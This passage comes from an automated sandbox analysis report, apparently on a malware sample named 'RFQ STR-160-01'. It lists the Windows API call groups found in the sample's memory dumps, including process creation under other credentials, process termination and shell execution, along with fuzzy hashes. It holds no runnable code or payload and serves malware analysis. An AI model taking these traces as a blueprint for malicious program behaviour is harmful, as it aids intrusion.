                • Part of subcall function 005F0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005F1002
              • GetLengthSid.ADVAPI32(?,00000000,005F1335), ref: 005F17AE
              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005F17BA
              • HeapAlloc.KERNEL32(00000000), ref: 005F17C1
              • CopySid.ADVAPI32(00000000,00000000,?), ref: 005F17DA
              • GetProcessHeap.KERNEL32(00000000,00000000,005F1335), ref: 005F17EE
              • HeapFree.KERNEL32(00000000), ref: 005F17F5
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
              • String ID:
              • API String ID: 3008561057-0
              • Opcode ID: c69a28e985f5db0898e23b508874ea1907db51e2eaa65cd096a3777deaf84683
              • Instruction ID: eab9e897703136e05e405847b3cd5d81096a6c74318ebcd65bbf4c1f9453224a
              • Opcode Fuzzy Hash: c69a28e985f5db0898e23b508874ea1907db51e2eaa65cd096a3777deaf84683
              • Instruction Fuzzy Hash: 4011BE31902A09FFDB24AFA4CC4ABBF7BAAFF41365F104018F54597210C73AA945DB64
              APIs
              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005F14FF
              • OpenProcessToken.ADVAPI32(00000000), ref: 005F1506
              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005F1515
              • CloseHandle.KERNEL32(00000004), ref: 005F1520
              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005F154F
              • DestroyEnvironmentBlock.USERENV(00000000), ref: 005F1563
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
              • String ID:
              • API String ID: 1413079979-0
              • Opcode ID: 5e396a1ee5ed0c7809967e30958c1640f87c3eef65e02ea01976082d1ca30cd8
              • Instruction ID: 8b9e0411d0f647788b3dcbf18eaab4e22aa003ed460d5c8336cd78bae38ffe3d
              • Opcode Fuzzy Hash: 5e396a1ee5ed0c7809967e30958c1640f87c3eef65e02ea01976082d1ca30cd8
              • Instruction Fuzzy Hash: AC11177250064EEBDF218F98DD49FEE7BAAFF48754F144015FA05A2060C3768E619B64
              APIs
              • GetLastError.KERNEL32(?,?,005B3379,005B2FE5), ref: 005B3390
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005B339E
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B33B7
              • SetLastError.KERNEL32(00000000,?,005B3379,005B2FE5), ref: 005B3409
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 727cece76ec95ea67a44f8f052a9200a1b3eaf609b96ffbca5587973f1230ac5
              • Instruction ID: 83ad5fe37c47cec18d292c90c13c2680c31730b64a76d39723be78a3a845d81e
              • Opcode Fuzzy Hash: 727cece76ec95ea67a44f8f052a9200a1b3eaf609b96ffbca5587973f1230ac5
              • Instruction Fuzzy Hash: 18014C33208712BEEB242774BC9A6E72F95FB45376B300629F410A11F0EF127D01D544
              APIs
              • GetLastError.KERNEL32(?,?,005C5686,005D3CD6,?,00000000,?,005C5B6A,?,?,?,?,?,005BE6D1,?,00658A48), ref: 005C2D78
              • _free.LIBCMT ref: 005C2DAB
              • _free.LIBCMT ref: 005C2DD3
              • SetLastError.KERNEL32(00000000,?,?,?,?,005BE6D1,?,00658A48,00000010,00594F4A,?,?,00000000,005D3CD6), ref: 005C2DE0
              • SetLastError.KERNEL32(00000000,?,?,?,?,005BE6D1,?,00658A48,00000010,00594F4A,?,?,00000000,005D3CD6), ref: 005C2DEC
              • _abort.LIBCMT ref: 005C2DF2
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 6be51fac5b911fdf749bbccc773f0ca81ccfb14e75b2777742c8a831f6643f5e
              • Instruction ID: c42b9db31c6ec68c5947cffb917e7b73e512c84b3dcf141d444b02a1b3817bd8
              • Opcode Fuzzy Hash: 6be51fac5b911fdf749bbccc773f0ca81ccfb14e75b2777742c8a831f6643f5e
              • Instruction Fuzzy Hash: B3F08635504B026FD72267F86C0AF5E1D5A7BD1771F25451CF426921D1DE3488035160
              APIs
                • Part of subcall function 005A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96A2
                • Part of subcall function 005A9639: BeginPath.GDI32(?), ref: 005A96B9
                • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96E2
              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00628A4E
              • LineTo.GDI32(?,00000003,00000000), ref: 00628A62
              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00628A70
              • LineTo.GDI32(?,00000000,00000003), ref: 00628A80
              • EndPath.GDI32(?), ref: 00628A90
              • StrokePath.GDI32(?), ref: 00628AA0
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
              • String ID:
              • API String ID: 43455801-0
              • Opcode ID: 4594498761b2de6d0860dd8b4050aae56c3f4d4442c2a76c178c4e44f8703f80
              • Instruction ID: ba1638d92a61f278db07272e770d8e4b5c06b00d9dc9133c8dbf13784ad74fd3
              • Opcode Fuzzy Hash: 4594498761b2de6d0860dd8b4050aae56c3f4d4442c2a76c178c4e44f8703f80
              • Instruction Fuzzy Hash: F1110C7600051DFFEF129F94DC48E9A7F6EEB08364F048011FA159A1A1C7729D55DFA0
              APIs
              • GetDC.USER32(00000000), ref: 005F5218
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 005F5229
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005F5230
              • ReleaseDC.USER32(00000000,00000000), ref: 005F5238
              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 005F524F
              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 005F5261
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: 029268a5651a19a34a60b6105ac66329714f70c3c221ba8e0bfc1b14056ad2ab
              • Instruction ID: fb59b37984326cc04ee461136850aa8c2b6f84a4dc7e381fce719b713863666e
              • Opcode Fuzzy Hash: 029268a5651a19a34a60b6105ac66329714f70c3c221ba8e0bfc1b14056ad2ab
              • Instruction Fuzzy Hash: 67018F75E00B08BBEB109BA69C49E5EBFB9FF48761F044165FB04A7281D6709801CBA0
              APIs
              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00591BF4
              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00591BFC
              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00591C07
              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00591C12
              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00591C1A
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00591C22
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Virtual
              • String ID:
              • API String ID: 4278518827-0
              • Opcode ID: 54bc562b02620e6042f95feab3ab5209894c256b521af19b7f4d4a8e2cf9f681
              • Instruction ID: 15126523f194e4ad346360752e03927d955e0d609b1171b3dbf4257a0ceefe5e
              • Opcode Fuzzy Hash: 54bc562b02620e6042f95feab3ab5209894c256b521af19b7f4d4a8e2cf9f681
              • Instruction Fuzzy Hash: 180167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
              APIs
              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005FEB30
              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005FEB46
              • GetWindowThreadProcessId.USER32(?,?), ref: 005FEB55
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB64
              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB6E
              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB75
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
              • String ID:
              • API String ID: 839392675-0
              • Opcode ID: 628290074e15895b4b632c84f476d5d454d9be77fbce034cd9b3090af99e21af
              • Instruction ID: fee45d6bde68b1e8536950a21601b57507979bed10880e101b47155f411d53a7
              • Opcode Fuzzy Hash: 628290074e15895b4b632c84f476d5d454d9be77fbce034cd9b3090af99e21af
              • Instruction Fuzzy Hash: 4FF05E72240D59BBE7315B629C0EEEF3E7EEFCAB21F005158F601D1091D7A45A02C6B5
              APIs
              • GetClientRect.USER32(?), ref: 005E7452
              • SendMessageW.USER32(?,00001328,00000000,?), ref: 005E7469
              • GetWindowDC.USER32(?), ref: 005E7475
              • GetPixel.GDI32(00000000,?,?), ref: 005E7484
              • ReleaseDC.USER32(?,00000000), ref: 005E7496
              • GetSysColor.USER32(00000005), ref: 005E74B0
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClientColorMessagePixelRectReleaseSendWindow
              • String ID:
              • API String ID: 272304278-0
              • Opcode ID: 50469b109ffaa88e7f5e4e90edee8ea14e9f5b51d5e681e703ed4104c377fd85
              • Instruction ID: e2e767d6021d7866dbccf60af4b0b2b4d063c518757134095a354ae6f5ce59c5
              • Opcode Fuzzy Hash: 50469b109ffaa88e7f5e4e90edee8ea14e9f5b51d5e681e703ed4104c377fd85
              • Instruction Fuzzy Hash: 95018631400A19EFEB215FA4DC08BAE7FB6FF08321F201460F916A21A0CB311E62AB50
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005F187F
              • UnloadUserProfile.USERENV(?,?), ref: 005F188B
              • CloseHandle.KERNEL32(?), ref: 005F1894
              • CloseHandle.KERNEL32(?), ref: 005F189C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 005F18A5
              • HeapFree.KERNEL32(00000000), ref: 005F18AC
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
              • String ID:
              • API String ID: 146765662-0
              • Opcode ID: 9065f2aeb31803b729148465938fa81642bb180d5e16ef7dddff1b9b195b0b6e
              • Instruction ID: 0431e543f85b82eda4bfad23fc82bcc1ac9a74d053534609f3441caf101792f1
              • Opcode Fuzzy Hash: 9065f2aeb31803b729148465938fa81642bb180d5e16ef7dddff1b9b195b0b6e
              • Instruction Fuzzy Hash: 6CE0C236004D02BBDB115BA1ED0D90ABB2AFF49B32B209620F22585074CB329432EB50
              APIs
              • __Init_thread_footer.LIBCMT ref: 0059BEB3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: D%f$D%f$D%f$D%fD%f
              • API String ID: 1385522511-2841713072
              • Opcode ID: 9587ee904dae7ea3f7e10ab2bc759b617e8ac2a6dce1aa95bc4974f3ab5382f0
              • Instruction ID: 6ba8c19ac665433aa35d6aeff3a06a35d80601bfe0c7372d0f75fdb0593f7147
              • Opcode Fuzzy Hash: 9587ee904dae7ea3f7e10ab2bc759b617e8ac2a6dce1aa95bc4974f3ab5382f0
              • Instruction Fuzzy Hash: D8915C75A0060ACFEF18CF58D1906AABBF2FF58310F24856AD946AB351D771ED81CB90
              APIs
                • Part of subcall function 005B0242: EnterCriticalSection.KERNEL32(0066070C,00661884,?,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B024D
                • Part of subcall function 005B0242: LeaveCriticalSection.KERNEL32(0066070C,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B028A
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
              • __Init_thread_footer.LIBCMT ref: 00617BFB
                • Part of subcall function 005B01F8: EnterCriticalSection.KERNEL32(0066070C,?,?,005A8747,00662514), ref: 005B0202
                • Part of subcall function 005B01F8: LeaveCriticalSection.KERNEL32(0066070C,?,005A8747,00662514), ref: 005B0235
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
              • String ID: +T^$5$G$Variable must be of type 'Object'.
              • API String ID: 535116098-1904898098
              • Opcode ID: 03394b5b0045e93c1249f5dfff7bc519de1c2a1cc7c836cbb46bfb16239926d3
              • Instruction ID: 3123abcdf55686ea18176f1698a21e8e53698455d087fd8dc15fe0eb6920036c
              • Opcode Fuzzy Hash: 03394b5b0045e93c1249f5dfff7bc519de1c2a1cc7c836cbb46bfb16239926d3
              • Instruction Fuzzy Hash: 84916D74A04209EFCB14EF94D8959EDBBB2FF89304F188059F8069B391DB71AE85CB51
              APIs
                • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FC6EE
              • _wcslen.LIBCMT ref: 005FC735
              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FC79C
              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005FC7CA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ItemMenu$Info_wcslen$Default
              • String ID: 0
              • API String ID: 1227352736-4108050209
              • Opcode ID: 8f7a79930214c4a901d6773daf58b50b9d6c844d01bd3a65253752dc4552dbe7
              • Instruction ID: b6050d70eaa508d202d19e4c53ee8c5bff826df00d63f016dd51e30679a052da
              • Opcode Fuzzy Hash: 8f7a79930214c4a901d6773daf58b50b9d6c844d01bd3a65253752dc4552dbe7
              • Instruction Fuzzy Hash: A451CF7160930D9BD714AF28CA49A7B7FE8FF85314F040A3DFA95D6190DB68D904CB92
              APIs
              • ShellExecuteExW.SHELL32(0000003C), ref: 0061AEA3
                • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
              • GetProcessId.KERNEL32(00000000), ref: 0061AF38
              • CloseHandle.KERNEL32(00000000), ref: 0061AF67
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseExecuteHandleProcessShell_wcslen
              • String ID: <$@
              • API String ID: 146682121-1426351568
              • Opcode ID: fbe05cde31e850efb4faf70d3b6a87ef1aad9ada1a954aa3ed2190a3845bf2e0
              • Instruction ID: 6941f02b8fb52a8922a494bf5431bcdc14ef3f7873fce0e5478c3ff923996805
              • Opcode Fuzzy Hash: fbe05cde31e850efb4faf70d3b6a87ef1aad9ada1a954aa3ed2190a3845bf2e0
              • Instruction Fuzzy Hash: 76714B71A00619DFCF14DF94C484A9EBBF1BF48314F088499E856AB3A2D774ED85CB91
              APIs
              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7206
              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005F723C
              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005F724D
              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005F72CF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorMode$AddressCreateInstanceProc
              • String ID: DllGetClassObject
              • API String ID: 753597075-1075368562
              • Opcode ID: 9bcfed1eea19e707b895bdc777edbc32986f89ee6593343d33497146352ecb6a
              • Instruction ID: eb4c10a65b78c2b6f75e0339df5f41994d1c201796a88cdf507d1c4f36b87c32
              • Opcode Fuzzy Hash: 9bcfed1eea19e707b895bdc777edbc32986f89ee6593343d33497146352ecb6a
              • Instruction Fuzzy Hash: 4E41827560460C9FDB15CF54C885AAA7FAAFF48310F1484ADBE059F20AD7B4DA45CBA0
              APIs
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00623E35
              • IsMenu.USER32(?), ref: 00623E4A
              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00623E92
              • DrawMenuBar.USER32 ref: 00623EA5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Menu$Item$DrawInfoInsert
              • String ID: 0
              • API String ID: 3076010158-4108050209
              • Opcode ID: 3e165f661fb2fb9f8a7e8d8a507c41a68dd9db0dac00388aa0e53b5b2205511b
              • Instruction ID: 717e6ba510111a59fba059965769dfb86f27467a93c192569a77e9b7c6aa023a
              • Opcode Fuzzy Hash: 3e165f661fb2fb9f8a7e8d8a507c41a68dd9db0dac00388aa0e53b5b2205511b
              • Instruction Fuzzy Hash: 3B418C75A00629AFDB10DF50E884AEABBB6FF45350F05411AE941AB350C334EE19CF51
              APIs
              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00622F8D
              • LoadLibraryW.KERNEL32(?), ref: 00622F94
              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00622FA9
              • DestroyWindow.USER32(?), ref: 00622FB1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$DestroyLibraryLoadWindow
